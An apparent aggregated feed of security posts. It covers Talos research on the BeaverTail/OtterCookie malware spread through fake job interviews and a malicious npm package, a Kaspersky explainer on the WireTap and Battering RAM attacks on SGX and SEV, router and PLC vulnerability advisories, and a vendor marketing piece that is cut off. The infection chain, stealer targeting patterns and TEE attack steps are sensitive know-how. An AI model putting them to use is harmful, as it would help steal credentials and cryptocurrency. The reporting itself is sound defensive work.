BeaverTail and OtterCookie evolve with a new Javascript module

  • Cisco Talos has uncovered a new attack linked to Famous Chollima, a threat group aligned with North Korea (DPRK). This group is known for impersonating hiring organizations to target job seekers, tricking them into installing information-stealing malware to obtain cryptocurrency and user credentials. 
  • In this incident, although the organization was not directly targeted, one of its systems was compromised-likely because a user was deceived by a fake job offer and installed a trojanized Node.js application called “Chessfi.” 
  • The malicious software was distributed via a Node.js package named “node-nvm-ssh” on the official NPM repository.
  • Famous Chollima often uses two malicious tools, BeaverTail and OtterCookie, which started as separate but complementary programs. Recent campaigns have seen their functions merging, and Talos has identified a new module for keylogging and taking screenshots. 
  • While searching for related threats, Talos also found a malicious VS Code extension containing BeaverTail and OtterCookie code. Although attribution to Famous Chollima is not certain, this suggests the group may be testing new methods for delivering their malware. 

Introduction 

BeaverTail and OtterCookie evolve with a new Javascript module

In a previous Cisco Talos blog post, we described one side of the Contagious Interview (Deceptive Development) campaigns, where the threat actor utilized fake employment websites, ClickFix social engineering techniques and payload variants of credential and cryptocurrency remote access trojans (RATs) known as GolangGhost and PylangGhost. 

 Talos is actively monitoring other clusters of these campaigns, which are attributed to the threat actor group Famous Chollima, a subgroup of Lazarus, and aligned with the economic interests of DPRK. This post discusses some of the tactics, techniques and procedures (TTPs) and changes in tooling developed over time by another large cluster of Contagious Interview activities. These campaigns center around tools known as BeaverTail and OtterCookie.  

 Famous Chollima frequently uses BeaverTail and OtterCookie, with many individual sub-clusters of activities installing InvisibleFerret, a Python based modular payload. Although BeaverTail and OtterCookie originated as separate-but-complementary entities, their functionality in some recent campaigns started to merge, along with the inclusion of new functional OtterCookie modules. 

 Talos detected a Famous Chollima campaign in an organization headquartered in Sri Lanka. The organization was not deliberately targeted by the attackers, but it had one of the systems on the network infected. It is likely that a user fell for a fake job offer instructing them to install a trojanised Node.js application called Chessfi as a part of a fake job interview process. 

Once Talos conducted the initial analysis, we realized that the tools used to conduct it had characteristics of BeaverTail and of OtterCookie, blurring the distinction between the two. The code also contained some additional functionality we have not previously encountered.  

BeaverTail and OtterCookie combine 

This blog focuses on OtterCookie modules and will not provide a deep dive into well-known BeaverTail and OtterCookie functionality. While some of these modules are already known, at least one was not previously documented. The examples we show are already deobfuscated, and with the help of an LLM, the function and variable names are replaced by names that correspond to their actual functionality. 

Keylogging and screenshotting module 

Talos encountered a keylogging and screenshotting module in this campaign that has not been previously documented. We were able to find earlier OtterCookie samples containing the module that were uploaded to VirusTotal in April 2025.  

The keylogging module uses the packages “node-global-key-listener” for keylogging, “screenshot-desktop” for taking desktop screenshots and “sharp” for converting the captured screenshots into web-friendly image formats. 

The module configures the packages to listen for keystrokes and periodically takes a screenshot of the current desktop session to upload them to the OtterCookie command and control (C2) server. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 1. The keylogger listens for the keyboard and mouse key presses and saves them into a file. 

The keystrokes are saved in the user’s temporary sub-folder windows-cache with the file name “1.tmp” and screenshots are saved in the same sub-folder with the file name “2.jpeg”. While the keylogger runs in a loop and flushes the buffer every second, a screenshot is taken every four seconds.  

Talos also discovered one instance of the module where the clipboard monitoring was included in the module code, extending its functionality to stealing clipboard content.  

The keylogging data and the captured screenshots are uploaded to the OtterCookie C2 server at a specific TCP port 1478, using the URL “hxxp[://]172[.]86[.]88[.]188:1478/upload”. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 2. Keystrokes saved as “1.tmp” and screenshots as “2.jpeg”, then uploaded to C2 server. 

OtterCookie VS Code extension 

During the search for similar samples on VirusTotal, Talos discovered a recently-uploaded VS Code extension, which may attempt to run OtterCookie if installed in the victim’s editor environment. The extension is a fake employment onboarding helper, supposedly allowing the user to track and manage candidate tests. 

While Talos cannot attribute this VS Code extension to Famous Chollima with high confidence, this may indicate that the threat actor is experimenting with different delivery vectors. The extension could also be a result of experimentation from another actor, possibly even a researcher, who is not associated with Famous Chollima, as this stands out from their usual TTPs. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 3. VS Code extension configuration pretends to be Mercer Onboarding Helper but contains OtterCookie code. 

Other OtterCookie modules 

The OtterCookie section of code starts with the definition of a JSON object that contains configuration values such as unique campaign ID and C2 server IP address. The OtterCookie portion of the code constructs additional modules from strings, which are executed as child processes. In the attack we analyzed, we observed three modules, but we also found one additional module while hunting for similar samples in our repositories and on VirusTotal.  

Remote shell module 

The first module is fundamental for OtterCookie and begins with the detection of the infected system platform and a virtual machine check, followed by reporting the collected user and host information to the OtterCookie C2 server. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 4. Main Ottercookie module starts with machine checking and includes virtual machines check. 

Once the system information is submitted, the module installs the “socket.io-client” package, which is used to connect to a specific port on the OtterCookie C2 server to wait for the commands and execute them in a loop. socket.io-client first uses HTTP and then switches to WebSocket protocol to communicate with the server, which we observed listening on the TCP port 1418.  

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 5. socket.io-client package used for communication with C2 server. 

Finally, depending on the operating system, this module periodically checks the clipboard content using the commands “pbpaste” on macOS or “powershell Get-Clipboard” on Windows. It sends the clipboard content to the C2 server URL specifically used for logging OtterCookie activities at “hxxp[://]172[.]86[.]88[.]188/api/service/makelog”. 

File uploading module 

This module enumerates all drives and traverses the file system in order to find files to be uploaded to the OtterCookie C2 IP address at a specific port and URL (in this case, “hxxp[://]172[.]86[.]88[.]188:1476/upload”).  

This module contains a list of folder and file names to be excluded from the search, and another list with target file name extensions and file name search patterns to select files to be uploaded.  

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 6. The list of excluded folders and patterns for files uploaded to C2. 

The “interesting” file list contains the following search patterns: 
 
“*.env*”, “*metamask*”, “*phantom*”, “*bitcoin*”, “*btc*”, “*Trust*”, “*phrase*”, “*secret*”, “*phase*”, “*credential”, “*profile*”, “*account*”, “*mnemonic*”, “*seed*”, “*recovery*”, “*backup*”, “*address*”, “*keypair*”, “*wallet*”, “*my*”, “*screenshot*”, “*.doc”, “*.docx”, “*.pdf”, “*.md”, “*.rtf”, “*.odt”, “*.xls”, “*.xlsx”, “*.txt”, “*.ini”, “*.secret”, “*.json”, “*.ts”, “*.js”, “*.csv” 

Cryptocurrency extensions stealer module 

While not present in the campaign Talos analyzed, this module was found while looking for similar files on VirusTotal. In addition to the targeting of cryptocurrency browser extensions by the BeaverTail code, this OtterCookie module targets extensions from a list that partially overlaps with the list of cryptocurrency wallet extensions from the BeaverTail part of the payload. 

BeaverTail and OtterCookie evolve with a new Javascript module
Table 1. Cryptocurrency modules targeted by OtterCookie. 

The cryptocurrency module targets Google Chrome and Brave browsers. If any extensions are found in any of the browser profiles, the extension files as well as the saved Login and Web data are uploaded to a C2 server URL. In the discovered sample Talos found, the uploading C2 URL was “hxxp[://]138[.]201[.]50[.]5:5961/upload”. 

OtterCookie evolution 

OtterCookie malware samples were first observed by NTT Security Holdings around November 2024, leading to a blog article published in December 2024. However, it is believed that the malware has been in use since approximately September 2024. The motivation for using the name OtterCookie seems to come from the early samples that used content of HTTP response cookies to transfer the malicious code executed by the response handler. This remote code loading functionality evolved over time to include additional functionality.  

However, in April 2025, Talos started seeing additional modules included within the OtterCookie code and the usage of the C2 server, mostly for downloading a simple OtterCookie configuration and uploading stolen data. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 7. OtterCookie modules evolution timeline.

OtterCookie evolved from the initial basic data-gathering capabilities to more modular design for data theft and remote command execution techniques. The modules are stored within OtterCookie strings and executed on the fly. 

The earliest versions, corresponding to what NTT researchers refer to as v1, contain code for remote command execution (RCE) and use a socket.IO package to communicate with a C2 server. Over time, OtterCookie modules evolved by adding code to steal and upload files, with the end goal of stealing cryptocurrency wallets from a list of hardcoded browser extensions and saved browser credentials. Targeted browsers include Brave, Google Chrome, Opera and Mozilla Firefox. 

The next iteration, referred to as v2, included a clipboard stealing code using the Clipboardy package to send clipboard contents to the remote server. This version also handles the loading of Javascript code from the server slightly differently. Instead of evaluating the returned header cookie as v1, the server generates an error which gets handled by the error handler on the client side. The error handler simply passes the error response data to the eval function, where it gets executed. The loader code is small and easy to miss, and along with the risk of false positive detections, this may be why the detection of the OtterCookie loaders on VirusTotal is not very successful. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 8. C2 server generates an error but the code is still executed by OtterCookie. 
BeaverTail and OtterCookie evolve with a new Javascript module
Figure 9. OtterCookie loader error handler evaluates the response data. 

The v3 variant, observed in February 2025, includes a function to send specific files (documents, image files and cryptocurrency-related files) to the C2 server. OtterCookie v4, observed since April 2025, includes a virtual environment detection code to help attackers discern logs from sandbox environments from those of actual infections, indicating a focus on evading analysis. The code also contains some anti-debugging and anti-logging functionality.  

The v4 variant improves on the previous version’s code and updates the clipboard content-stealing method. It no longer uses the Clipboardy library and instead it uses standard macOS or Windows commands for retrieving clipboard content. 

It is important to note that over time the difference between BeaverTail and OtterCookie became blurred and in some attacks their code was merged into a single tool.  

OtterCookie v5 

The campaign Talos observed in August 2025 uses the most recent version of OtterCookie, which we call v5, demonstrated by the addition of a keylogging module. The keylogging module contains code to capture screenshots, which are uploaded to the C2 server together with keyboard keystrokes. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 10. Node-nvm-ssh infection path. 

The initial infection vector was a modified Chessfi application hosted on Bitbucket. ChessFi is a web3-based multiplayer chess platform where players can challenge each other and bet cryptocurrency on the outcome of their matches. The choice of a cryptocurrency-related application to lure victims is consistent with previous reporting of Famous Chollima targeting.  

The first sign of the attack was the user installing the source code of the application. Based on the folder name of the project, we assess with moderate confidence that the victim was approached by the threat actor through the freelance marketplace site Fiverr, which is consistent with the previous reporting. While hunting for similar samples we have also discovered code repositories that were uploaded for the victim as attachments to Discord conversations.   

The infection process started with the victim running Git to clone the repository: 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 11. The initial infection vector. 

The Development section of the application’s readme document gives instructions to developers on how to install and run the project. After cloning the repository, it states that the users should run npm install to install dependencies, which, in this campaign, also included a malicious npm package named “node-nvm-ssh”. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 12. Modified application installation steps. 

During the installation of dependencies, the malicious package is downloaded from the repository and installed. The npm installer parses the package.json file of the malicious package and finds instructions to run commands after the installation. This is executed by parsing the “postinstall” value of the JSON object named “scripts”. At the first glance, it seems like the postinstall scripts are there to run tests, transpile TypeScript files to Java script and possibly run other test scripts. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 13. Malicious package.json file contains the instruction that will cause the malicious code to run. 

However, the package.json module installation instruction “npm run skip” causes npm to call the command node test/fixtures/eval specified in the value “skip”. The default node.js loading conventions will try loading a number of file names if none of them are specifically mentioned, one of them being index.js. 

The test/fixtures/eval/index.js content contains code to spawn a child process using the file “test/fixtures/eval/node_modules/file15.js”. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 14. index.js spawning a child process to execute file15.js. 

Eventually, file15.js loads the file test.list, which is the final payload. This somewhat complex process to reach the payload code makes it quite difficult for an unsuspecting software engineer to discover that the installation of the Chessfi application will eventually lead to execution of malicious code.   

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 15. file15.js reads and calls eval on the content of the file test.list.

With test.list we have finally reached the last piece of the puzzle of how the malicious code is run. The test.list file is over 100KB long and obfuscated using Obfuscator.io. Thankfully, the obfuscation in this case is not configured to make the analysis very difficult and with the help of the deobfuscator and an LLM, Talos was able to deobfuscate most of its functionality, revealing a combination of BeaverTail and OtterCookie. 

Standard BeaverTail functionality 

There seem to be two distinguishable parts in the code. The first is associated with BeaverTail, including enumeration of various browser profiles and extensions as well as the download of a Python distribution and Python client payload from the C2 server “23.227.202[.]244” using the common BeaverTail/InvisibleFerret TCP port 1224. The second part of the code is associated with OtterCookie. 

The BeaverTail portion starts with a function that disables the console logging, moving toward loading the required modules and calling functions in order to steal data from a list of browser extensions, cryptocurrency wallets and browser credentials storage.   

BeaverTail and OtterCookie evolve with a new Javascript module
Table 2. Targeted BeaverTail cryptocurrency browser extensions.

BeaverTail evolution 

BeaverTail has been observed since at least May 2023, and originally was a relatively small downloader component, designed to be included with Node.js based Javascript applications. BeaverTail was also used in supply chain attacks affecting packages in the NPM package repository, which was extensively covered in the previous research and it is outside of the scope of this post. 

From the beginning, BeaverTail supported Windows, Linux and macOS, taking advantage of the fact that Node.js applications can be run on different operating system platforms.  

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 16. Early BeaverTail OS platform check. 

The other major functionalities within BeaverTail are the download of InvisibleFerret Python stealer payload modules and installation of a remote access module, typically an AnyDesk client, which would allow the attacker to take over the control of the infected machine remotely. Information stealing and remote access have remained recurring BeaverTail operational techniques over time. 

Soon after the initial samples were discovered in June 2023, BeaverTail started to use simple base64 encoding of strings and renaming of variables to make the detection and analysis more difficult. This also included a scheme used to encode the C2 URL as a shuffled string whose slices are base64 decoded individually and then concatenated in a correct order to generate the final URL.  

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 17. C2 URL encoding scheme used from early BeaverTail variants until the present. 

Although BeaverTail is typically written in Javascript, Talos has also discovered several Javascript C2 IP server addresses. These were shared with C++ compiled binary variants created with the help of the Qt framework

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 18. Qt based BeaverTail setting a Qthread parameters. 

From the early beginnings in mid-2023, to the last quarter of 2024. BeaverTail C2 URL patterns stabilized around the most commonly-used TCP ports 1224 and 1244, rather than the port 3306 used by early variants. It seems that the threat actors quickly realized that most Windows installations do not come with preinstalled Python interpreters as Linux distributions and macOS. To tackle this issue, they included code which installs a Python distribution, typically from the “/pdown” URL path, required to run Python InvisibleFerret modules. This TTP remains until today. 

In terms of detection evasion, Famous Chollima are using several methods to obfuscate code, most frequently utilzing different configurations of the free Javascript tool Obfuscator.io which does make the analysis and especially detection of the malicious code more challenging.  

In addition to obfuscating the Javascript code they also regularly use various modes of XOR-based obfuscation of downloaded modules. XORed Python InvisibleFerret modules start with a unique user based string assignment followed by a reversed base64 encoded string, which contains the final Python module’s code that can also be XORed for obfuscation. 

BeaverTail and OtterCookie evolve with a new Javascript module
Figure 19. A typical InvisibleFerret self-decoding Python module. 

Thankfully, by using the combination of a deobfuscating tool and an LLM to rename the variables and base64 decode encoded strings it is possible to analyse new samples with relative ease. However, the operational tempo of groups attributed to Famous Chollima is high and the detection of completely new samples and code on VirusTotal remains unreliable, allowing threat actors enough time to successfully attack some victims. 

BeaverTail, OtterCookie and InvisibleFerret functional overlaps

All additional modules present in OtterCookie code correspond well to the functionality that is traditionally associated with InvisibleFerret and its Python-based modules, as well as some parts of the BeaverTail code. This move of the functionality to Javascript may allow the threat actors to remove the reliance on Python code, eliminating the requirement for installation of full Python distributions on Windows. 

BeaverTail and OtterCookie evolve with a new Javascript module
Table 3. Functional similarities between Famous Chollima tools. 

Coverage   

Ways our customers can detect and block this threat are listed below.    

BeaverTail and OtterCookie evolve with a new Javascript module

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.   

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.   

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.   

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.   

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.   

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please   

contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.   

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.    

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.    

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.   

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.    

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort2 rules are available for this threat: 65336 

The following Snort3 rules are also available to detect the threat: 301315, 65336 

ClamAV detections are also available for this threat: Js.Infostealer.Ottercookie-10057842-0, Js.Malware.Ottercookie-10057860-0   

IOCs

IOCs for this research can also be found at our GitHub repository here.

Early OtterCookie 

f08e3ee84714cc5faefb7ac300485c879356922003d667587c58d594d875294e 

BeaverTail evolution: 

72ebfe69c69d2dd173bb92013ab44d895a3367f91f09e3f8d18acab44e37b26d 

caad2f3d85e467629aa535e0081865d329c4cd7e6ff20a000ea07e62bf2e4394 

8efa928aa896a5bb3715b8b0ed20881029b0a165a296334f6533fa9169b4463b 

 

Malicious npm package Aug 2025

83c145aedfdf61feb02292a6eb5091ea78d8d0ffaebf41585c614723f36641d8 -test.list 

 

Similar to our campaign 

77aec48003beeceb88e70bed138f535e1536f4bbbdff580528068ad6d184f379 

0904eff1edeff4b6eb27f03e0ccc759d6aa8d4e1317a1e6f6586cdb84db4a731 

d27c9f75c3f1665ee19642381a4dd6f2e4038540442cf50948b43f418730fd0a 

51ddd8f6ff30d76de45e06902c45c55163ddbec7d114ad89b21811ffedb71974 

d89c45d65a825971d250d12bc7a449321e1977f194e52e4ca541e8a908712e47 

6a9b4e8537bb97e337627b4dd1390bdb03dc66646704bd4b68739d499bd53063 

a6914ded72bdd21e2f76acde46bf92b385f9ec6f7e6b7fdb873f21438dfbff1d 

 

VSCode Extension

9e65de386b40f185bf7c1d9b1380395e5ff606c2f8373c63204a52f8ddc01982 

dff2a0fb344a0ad4b2c129712b2273fda46b5ea75713d23d65d5b03d0057f6dd – raw.js 

 

C2 URLs
hxxp[://]23[.]227[.]202[.]244:1224/uploads 

hxxp[://]23[.]227[.]202[.]244:1224/pdown 

hxxp[://]23[.]227[.]202[.]244:1224/client/14/144 

hxxp[://]23[.]227[.]202[.]244:1224/payload/14/144 

hxxp[://]23[.]227[.]202[.]244:1224/brow/14/144 

hxxp[://]23[.]227[.]202[.]244:1224/keys  

hxxp[://]172[.]86[.]88[.]188:1418/socket[.]io/ 

hxxp[://]172[.]86[.]88[.]188:1476/upload 

hxxp[://]172[.]86[.]88[.]188/api/service/makelog 

hxxp[://]172[.]86[.]88[.]188/api/service/process/c841b6c4ac4d2e83f16cf7a8bfbec3d7 

hxxp[://]138[.]201[.]50[.]5:5961/upload 

hxxp[://]135[.]181[.]123[.]177/api/service/makelog 

hxxp[://]144[.]172[.]96[.]35/api/service/makelog 

hxxp[://]144[.]172[.]112[.]50/api/service/makelog 

hxxp[://]172[.]86[.]73[.]46 

hxxp[://]135[.]181[.]123[.]177 

hxxp[://]172[.]86[.]113[.]12

Download URLs 

hxxps[://]www[.]npmjs[.]com/package/node-nvm-ssh 

hxxps[://]bitbucket[.]org/dev-chess/chess-frontend[.]git 

Cisco Talos Blog – ​Read More

WireTap and Battering RAM: attacks on TEEs | Kaspersky official blog

Modern server processors feature a trusted execution environment (TEE) for handling especially sensitive information. There are many TEE implementations, but two are most relevant to this discussion: Intel Software Guard eXtensions (SGX), and AMD Secure Encrypted Virtualization (SEV). Almost simultaneously, two separate teams of researchers — one in the U.S. and one in Europe — independently discovered very similar (though distinct) methods for exploiting these two implementations. Their goal was to gain access to encrypted data held in random access memory. The scientific papers detailing these results were published just days apart:

  • WireTap: Breaking Server SGX via DRAM Bus Interposition is the effort of U.S. researchers, which details a successful hack of the Intel Software Guard eXtensions (SGX) system. They achieved this by intercepting the data exchange between the processor and the DDR4 RAM module.
  • In Battering RAM, scientists from both Belgium and the UK also successfully compromise Intel SGX, as well as AMD’s comparable security system, SEV-SNP, by manipulating the data-transfer process between the processor and the DDR4 RAM module.

Hacking a TEE

Both the technologies mentioned — Intel SGX and AMD SEV — are designed to protect data even if the system processing it is completely compromised. Therefore, the researchers began with the premise that the attacker would have complete freedom of action: full access to both the server’s software and hardware, and the confidential data they seek residing, for instance, on a virtual machine running on that server.

In that scenario, certain limitations of both Intel SGX and AMD SEV become critical. One example is the use of deterministic encryption: an algorithm where a specific sequence of input data always produces the exact same sequence of encrypted output data. Since the attacker has full access to the software, they can input arbitrary data into the TEE. If the attacker also had access to the resulting encrypted information, comparing these two data sets would allow them to calculate the private key used. This, in turn, would enable them to decrypt other data encrypted by the same mechanism.

The challenge, however, is how to read the encrypted data. It resides in RAM, and only the processor has direct access to it. The theoretical malware only sees the original information before it gets encrypted in memory. This is the main challenge, which the researchers approached in different ways. One straightforward, head-on solution is hardware-level interception of the data being transmitted from the processor to the RAM module.

How does this work? The memory module is removed and then reinserted using an interposer, which is also connected to a specialized device: a logic analyzer. The logic analyzer intercepts the data streams traveling across all the data and address lines to the memory module. This is quite complex. A server typically has many memory modules, so the attacker must find a way to force the processor to write the target information specifically to the desired range. Next, the raw data captured by the logic analyzer must be reconstructed and analyzed.

But the problems don’t end there. Modern memory modules exchange data with the processor at tremendous speeds, performing billions of operations per second. Intercepting such a high-speed data flow requires high-end equipment. The hardware that was used to prove the feasibility of this type of attack in 2021 cost hundreds of thousands of dollars.

The features of WireTap

The U.S. researchers behind WireTap managed to slash the cost of their hack to just under a thousand dollars. Their setup for intercepting data from the DDR4 memory module looked like this:

Wiretap Test system

Test system for intercepting the data exchange between the processor and the memory module Source

They spent half of the budget on an ancient, quarter-century-old logic analyzer, which they acquired through an online auction. The remainder covered the necessary connectors, and the interposer (the adapter into which the target memory module was inserted) was custom-soldered by the authors themselves. An obsolete setup like this could not possibly capture the data stream at its normal speed. However, the researchers made a key discovery: they could slow down the memory module’s operation. Instead of the standard DDR4 effective speeds of 1600–3200 megahertz, they managed to throttle the speed down to 1333 megahertz.

From there, the steps are… well, not really simple, but clear:

  1. Ensure that the data from the target process was written to the hacked memory module and then intercept it, still encrypted at this stage.
  2. Input a custom data set into Intel SGX for encryption.
  3. Intercept the encrypted version of the known data, compare the known plaintext with the resulting ciphertext, and compute the encryption key.
  4. Decrypt the previously captured data belonging to the target process.

In summary, WireTap work doesn’t fundamentally change our understanding of the inherent limitations of Intel SGX. It does however demonstrate that the attack can be made drastically cheaper.

The features of Battering RAM

Instead of the straightforward data-interception approach, the researchers from Belgium’s KU Leuven university and their UK colleagues sought a more subtle and elegant method to access encrypted information. But before we dive into the details, let’s look at the hardware component and compare it to the American team’s work:

The memory module interposer

The memory module interposer used in Battering RAMSource

In place of a tangle of wires and a bulky data analyzer, this setup features a simple board designed from scratch, into which the target memory module is inserted. The board is controlled by an inexpensive Raspberry Pi Pico microcomputer. The hardware budget is negligible: just 50 euros! Moreover, unlike the WireTap attack, Battering RAM can be conducted covertly; continuous physical access to the server isn’t needed. Once the modified memory module is installed, the required data can be stolen remotely.

What exactly does this board do? The researchers discovered that by grounding just two address lines (which dictate where information is written or read) at the right moment, they could create a data mirroring situation. This causes information to be written to memory cells that the attacker can access. The interposer board acts as a pair of simple switches controlled by the Raspberry Pi microcomputer. While manipulating contacts on live hardware typically leads to a system freeze or data corruption, the researchers achieved stable operation by disconnecting and reconnecting the address lines only at the precise moments required.

This method gave the authors the ability to select where their data was recorded. Crucially, this means they didn’t even need to compute the encryption key! They first captured the encrypted information from the target process. Next, they ran their own program within the same memory range and requested the TEE system to decrypt the previously captured information. This technique allowed them to hack not only Intel SGX but also AMD SEV. Furthermore, this control over data writing helped them circumvent AMD’s security extension called SEV-SNP. This extension, using Secure Nested Paging, was designed to protect the virtual machine from compromise by preventing data modification in memory. Circumventing SEV-SNP theoretically allows attackers not only to read encrypted data but also to inject malicious code into a compromised virtual machine.

The relevance of physical attacks on server infrastructure

It’s clear that while the practical application of such attacks is possible, they’re unlikely to be conducted in the wild. The value of the stolen data would need to be extremely high to justify hardware-level tampering. At least, this is the stance taken by both Intel and AMD regarding their security solutions: both chipmakers responded to the researchers by stating that physical attacks fall outside their security model. However, both the American and European research teams demonstrated that the cost of these attacks is not nearly as high as previously believed. This potentially expands the list of threat actors willing to utilize such complex vulnerabilities.

The proposed attacks do come with their own restrictions. As we already mentioned, the information theft was conducted on systems equipped with DDR4 standard memory modules. The newer DDR5 standard, finalized in 2020, has not yet been compromised, even for research purposes. This is due both to the revised architecture of the memory modules and their increased operating speeds. Nevertheless, it’s highly likely that researchers will eventually find vulnerabilities in DDR5 as well. And that’s a good thing: the declared security of TEE systems must be regularly subjected to independent audits. Otherwise, it could turn out at some point that a supposedly trusted protection system unexpectedly becomes completely useless.

Kaspersky official blog – ​Read More

Open PLC and Planet vulnerabilities

Open PLC and Planet vulnerabilities

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one vulnerability in the OpenPLC logic controller and four vulnerabilities in the Planet WGR-500 router.  

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

OpenPLC denial-of-service vulnerability

Discovered by a member of Cisco Talos.   

OpenPLC is an open-source programmable logic controller intended to provide a low cost industrial solution for automation and research. 

Talos researchers found TALOS-2025-2223 (CVE-2025-53476), a denial-of-service vulnerability in the ModbusTCP server functionality of OpenPLC_v3. A specially crafted series of network connections can prevent the server from processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.

Planet WGR-500 stack-based buffer overflow, OS command injection, format string vulnerabilities

Discovered by Francesco Benvenuto of Cisco Talos.   

The Planet Networking & Communication WGR-500 is an industrial router designed for Internet of Things (IoT) networks, particularly industrial networks such as transportation, government buildings, and other public areas. Talos found four vulnerabilities in the router software.

TALOS-2025-2226 (CVE-2025-54399-CVE-2025-54402) includes multiple stack-based buffer overflow vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to stack-based buffer overflow.

TALOS-2025-2227 (CVE-2025-54403-CVE-2025-54404) includes multiple OS command injection vulnerabilities in the swctrl functionality. A specially crafted network request can lead to arbitrary command execution.

TALOS-2025-2228 (CVE-2025-48826) is a format string vulnerability in the formPingCmd functionality of Planet WGR-500. A specially crafted series of HTTP requests can lead to memory corruption.

TALOS-2025-2229 (CVE-2025-54405-CVE-2025-54406) includes multiple OS command injection vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to arbitrary command execution.

Cisco Talos Blog – ​Read More

5 Ways Threat Intelligence Saves Businesses Money and Resources 

Cybersecurity is not just about defense, it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.  

Here is how actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate. 

Key Takeaways 

  • TI turns security into a cost-saving engine by preventing breaches that could otherwise drain millions in recovery and reputational damage. 
  • Automation eliminates labor waste, allowing SOC teams to focus on high-value tasks instead of drowning in false positives. 
  • TI drives faster response which minimizes disruptions, reducing downtime and the cascading financial losses that follow. 
  • Continuous intelligence future-proofs defenses, keeping organizations ahead of evolving threats without constant manual updates. 
  • Seamless integration protects existing investments, embedding TI into current workflows without costly overhauls. 

3 Hidden Costs of Ignoring Threat Intelligence 

1. SOC Inefficiency and Burnout 

When SOC analysts lack high-fidelity, context-rich threat intelligence, they are forced to manually investigate thousands of alerts, many of which turn out to be false positives. This relentless cycle wastes time, drains budgets, increases turnover, and leaves critical threats unaddressed.  

Without automation and precise data, teams operate in a constant state of reactive chaos, where even minor incidents consume disproportionate resources. 

  • Analyst burnout makes people over two times more likely to look for a new job. 

2. Undetected Threats Escalate into Financial Disasters 

Lack of threat intelligence is just one of the drivers of low detection rates

Cyberattacks exploit gaps in visibility and slow response times. Organizations relying on outdated or generic TI feeds often miss targeted, evasive threats until it is too late. By the time a breach is detected, the damage in terms of downtime, regulatory fines, and lost customer trust has already begun. The financial effects of a single incident can cripple budgets and erode market position for years. 

  • $4.4M is the average breach cost for companies today. 
  • 60% of SMBs close within 6 months of a breach. 

3. Compliance Gaps Trigger Fines and Legal Risks 

Regulatory bodies do not accept “we didn’t see it coming” as an excuse. Without real-time, comprehensive TI, organizations struggle to detect, document, and mitigate threats in ways that satisfy auditors. The result is hefty fines, legal battles, and mandatory security overhauls that could have been avoided with proactive intelligence.

  • HIPAA violations may reach $1.5M+ per incident

5 Ways Threat Intelligence Saves Money and Resources 

1. Helps Stop Breaches Before They Start 

Threat Intelligence Feeds: data source, integration options

The financial impact of a cyberattack extends far beyond the immediate incident. Downtime, regulatory penalties, and reputational harm can accumulate into millions in losses even for a single event. Most organizations do not realize how many attacks slip through their defenses until it’s too late. The difference between a near-miss and a full-blown crisis often comes down to how quickly and accurately threats are identified. 

ANY.RUN’s Threat Intelligence Feeds provide actionable, real-time intelligence needed to block threats at the earliest stage. Instead of reacting to breaches after the fact, teams can neutralize risks before they execute, turning potential disasters into routine intercepts. 

How ANY.RUN Helps

  • TI Feeds and Threat Intelligence Lookup deliver 24× more IOCs per incident from 15,000+ SOCs’ real-world investigations, offering instant, deep context on emerging threats, so analysts confirm and contain attacks in seconds

Reduce MTTR and minimize risks with ANY.RUN’s solutions
Request a quote or trial for your SOC  



Contact us


2. Eliminates Wasteful Spending on False Positives 

SOC teams are overwhelmed by alert fatigue, with analysts spending hours each day chasing down irrelevant or duplicate threats. This becomes both a productivity issue and a financial drain, as organizations pay for overtime, burnout, and unnecessary tooling that does not address real risks. The problem compounds when teams lack the context to prioritize threats effectively, leading to misallocated resources and missed critical alerts. 

ANY.RUN’s solutions filter out the noise, ensuring teams focus only on verified, high-impact threats. This shift saves time and redirects budgets from wasteful investigations to proactive and fast incident handling. 

How ANY.RUN Helps

  • TI Feeds cut through irrelevant alerts, delivering only filtered, malicious IOCs, which saves hours of work and speeds up response.
